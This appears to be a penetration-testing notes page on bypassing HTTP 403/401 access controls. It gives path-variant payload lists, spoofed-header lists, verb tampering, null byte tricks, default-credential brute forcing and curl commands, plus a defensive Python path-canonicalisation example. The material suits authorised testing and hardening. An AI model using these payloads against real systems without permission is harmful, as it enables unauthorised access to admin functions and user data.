# Bypass 403 / 401

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Bruteforce 401 - Default credentials

{% embed url="https://github.com/lobuhi/byp4xx" %}

```
~/Bureau/Tools/403/byp4xx$ ls templates/
defaultcreds.txt  endpaths.txt  extensions.txt  headers.txt  ip.txt  midpaths.txt  UserAgents.txt  verbs.txt


$ go run byp4xx.go -xV -xH -xUA -xX -xM -xE https://www-dev.target.lan/
    __                 __ __           
   / /_  __  ______   / // / _  ___  __
  / __ \/ / / / __ \ / // /_| |/_/ |/_/
 / /_/ / /_/ / /_/ //__  __/>  <_>  <  
/_.___/\__, / .___/   /_/ /_/|_/_/|_|  
      /____/_/                        
by: @lobuhisec 

===== https://www-dev.target.lan/ =====
==DEFAULT CREDS==
Developer:isdev: 200
```

## Bypass 403 or 302

```
/admin -> 403 or 302

/Admin
/AdMin
/admin/
/admin/. 
//admin//
/.;/admin
/./admin/..
/admin.json
/;/admin
//;//admin
/admi%6e [n is url encoded to %6e]
/%2e/admin
/admin#
/admin;/
/admin/~
/./admin/./
/admin?param
/admin..;/
/admin%20
/admin%09
/admin/..;/
/static../admin.jsp
/admin..;/
/../admin
/..;/admin

X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
```

```
curl -i https://target.com/admin -H "X-Original-URL: /admin"

curl -i https://target.com/admin -X POST -H "X-Custom-IP-Authorization: 127.0.0.1"
```


## Capitalize the path

A request to `/ADMIN/DELETEUSER` may still be mapped to `/admin/deleteUser` if the server routes paths case-insensitively.

```
curl https://example.com/AdMiN
```

## Add Suffix

```
curl https://example.com/admin.json
```

```
PUT /my_day/jobs/4 HTTP/2 = 403
PUT /my_day/jobs/4.json HTTP/2 = 200 OK
```

## URL encoding

```
# Try %2e%2e%2f (../) or %20 (space)
curl -g --path-as-is "https://example.com/%2e%2e/admin"
```

## Spring framework

If the Spring framework has the `useSuffixPatternMatch` option enabled, a request to `/admin/deleteUser.anything` still matches the `/admin/deleteUser` pattern.

Prior to Spring 5.3, this option was enabled by default.
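As an added example (not code from this page or from any tool it links), the Python below models why the path variants above get past a check done on the raw request path, and shows the hardened alternative: authorise on the canonical path the backend will actually route. The normalisation steps it models and the `/admin` rule are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

PROTECTED_PREFIX = "/admin"   # constructed: the route the access-control rule is meant to cover


def naive_is_protected(raw_path: str) -> bool:
    """The common mistake: the gateway or WAF compares the *raw* request path."""
    return raw_path.startswith(PROTECTED_PREFIX)


def canonicalize(raw_path: str) -> str:
    """Approximate how a lenient backend normalises a path before routing it.

    Models the quirks listed above: percent-encoding (/admi%6e, /%2e/admin),
    ";param" segments (/;/admin, /..;/admin), repeated slashes (//admin//),
    dot segments (/./admin/./), trailing %20/%09, suffix matching (/admin.json,
    Spring's useSuffixPatternMatch) and case-insensitive routing (/AdMiN).
    """
    path = re.split(r"[?#]", raw_path, maxsplit=1)[0]          # drop query and fragment
    for _ in range(3):                                         # undo (double) percent-encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]   # strip ";jsessionid=..." style params
    path = re.sub(r"/+", "/", "/".join(segments)).rstrip(" \t")
    path = posixpath.normpath("/" + path.lstrip("/"))          # resolve "." and "..", clamped at "/"
    head, _, last = path.rpartition("/")
    if "." in last.strip("."):                                  # "deleteUser.anything" -> "deleteUser"
        last = last.rsplit(".", 1)[0]
    return (head + "/" + last).lower()


def hardened_is_protected(raw_path: str) -> bool:
    """Authorise on the canonical path and match on a segment boundary."""
    canon = canonicalize(raw_path)
    return canon == PROTECTED_PREFIX or canon.startswith(PROTECTED_PREFIX + "/")


def compare(paths):
    """Map each path to (naive, hardened) so the gap between the two checks is visible."""
    return {p: (naive_is_protected(p), hardened_is_protected(p)) for p in paths}


if __name__ == "__main__":
    variants = ["/admin", "/AdMiN", "//admin//", "/.;/admin", "/admi%6e", "/%2e/admin",
                "/;/admin", "/..;/admin", "/admin%09", "/ADMIN/DELETEUSER.anything"]
    for path, (naive, hardened) in compare(variants).items():
        print(f"{path:28} naive={naive!s:5} hardened={hardened}")
```

Every variant in the list resolves to the protected route under the hardened check, while the raw-path check misses most of them; note the segment-boundary test, which keeps `/administrator` from being swept in by a bare prefix match.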

## API - IDOR

{% content-ref url="/pages/IOD663Ce41jBvBI2oynu" %}
[IDOR](/0xss0rz/pentest/api/idor.md)
{% endcontent-ref %}

```
/api/67898555007/users -> 403

/api//users
/api\\users

/api/v1/user/id -> 403

/api/v1/user/id.json
/api/v1/user/id?
/api/v1/user/id/
/api/v2/user/id
/api/v1/user/id&accountdetail
/api/v1/user/yourid&victimid

X-Original-Url: /api/v1/user/id
```

Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID; some backends might respond with the data of all users.

```
GET /api/users/* HTTP/1.1
GET /api/users/% HTTP/1.1
GET /api/users/_ HTTP/1.1
GET /api/users/. HTTP/1.1
```

## Git

{% hint style="success" %}
*If a path under `.git/` returns 403, `/.git/config` might still return 200!*
{% endhint %}

## Wordpress

The `X-Rewrite-Url` header can be used to bypass WordPress 403 pages.

```
POST /xmlrpc HTTP/1.1
Host: blah.com
X-Rewrite-Url: xmlrpc.php
X-Rewrite-Url: wp-json/v2/users
X-Rewrite-Url: wp-login.php
```

## Burp Extensions - 403 Bypasser


## HTTP Verb Tampering

{% content-ref url="/pages/FdfHddWyfvIlPnhkmKMn" %}
[HTTP Verb Tampering](/0xss0rz/pentest/web-attacks/http-verb-tampering.md)
{% endcontent-ref %}

Change the request method from **GET** to **TRACE**, etc.

```
curl -X TRACE https://example.com/admin --path-as-is
```


```
GET /admin HTTP/1.1
Host: target.com
```

Change the method like this:

```
POST /admin HTTP/1.1
Host: target.com
```

If the application supports a method-override header, you can also test like this:

```
POST /admin HTTP/1.1
Host: target.com
X-http-method-override: GET

Or

X-http-override: GET
```

## Fuzz

```
/FUZZ/admin
/admin/FUZZ
/adminFUZZ
```

## **Payload List**

{% embed url="https://raw.githubusercontent.com/sabir789/BugBountyTips/refs/heads/Master/Payloads" %}

1. **Set Up Burp Suite Intruder:**
   * Open Burp Suite and navigate to the **Intruder** tab.
   * Send your request to Intruder by right-clicking on it in the Proxy tab and selecting **Send to Intruder**.
   * Configure the Intruder positions by selecting the directory or path you want to bypass.
2. **Load the Payloads:**
   * Copy the payloads from the provided wordlist.
   * Paste the payloads into the **Payload Options** input field in the Intruder tab.
3. **Payload Processing:**
   * Below the Payload Options section, locate the **Payload Processing** tool.
   * Click the **Add** button to open a new window.
   * Select the rule **Replace String**.
   * Replace the placeholder `{base}` with the base value you want to use for bypassing.
4. **Disable URL Encoding:**
   * Uncheck the option **URL-encode these characters** to ensure the payloads are not altered.
5. **Start the Attack:**
   * Click **Start Attack** and observe the results.
   * Look for requests that return a **200 status code**, indicating a successful bypass.


## **Content-Length:0**

```
curl -X POST -H "Content-Length:0" https://www.redacted.com
```

{% embed url="https://sagarsajeev.medium.com/sensitive-data-exposure-via-403-forbidden-bypass-df9b4dcd0fd" %}

## 403 Header Bypass

```
curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/admin
curl -H "Referer: https://example.com" https://example.com/restricted
curl -H "X-Original-URL: /admin" https://example.com/404
curl -H "X-Rewrite-URL: /admin" https://example.com/404
```

{% embed url="https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/403_header_payloads.txt" %}

```
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

OR

GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin
```

```
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
```

## Parameter Tampering

```
curl "https://example.com/admin?unused_param=1"
curl "https://example.com/admin?redirect=allowed"
```

**Secret Trick**: Override parameters with conflicting values:

```
curl "https://example.com/admin?admin=false&admin=true"
```

## Null Byte Injection

```
curl --path-as-is "https://example.com/admin.php%00.html"
```

## HTTP Version Downgrade

```
curl --http1.0 https://example.com/admin
```

## Bypass Origin

{% embed url="https://github.com/assetnote/newtowner" %}

## Tools

Go-recon - ***gr-403***:

{% embed url="https://github.com/D3Ext/go-recon?tab=readme-ov-file#installation" %}

{% embed url="https://github.com/devploit/nomore403" %}

{% embed url="https://github.com/trap-bytes/403jump" %}

{% embed url="https://github.com/iamj0ker/bypass-403.git" %}

{% embed url="https://github.com/yunemse48/403bypasser" %}

{% embed url="https://github.com/Dheerajmadhukar/4-ZERO-3" %}

```
# byp4xx $TARGET
```

## Resources

{% embed url="https://infosecwriteups.com/100-200-worth-403-bypass-techniques-e4c22064091a" %}


## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.


[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
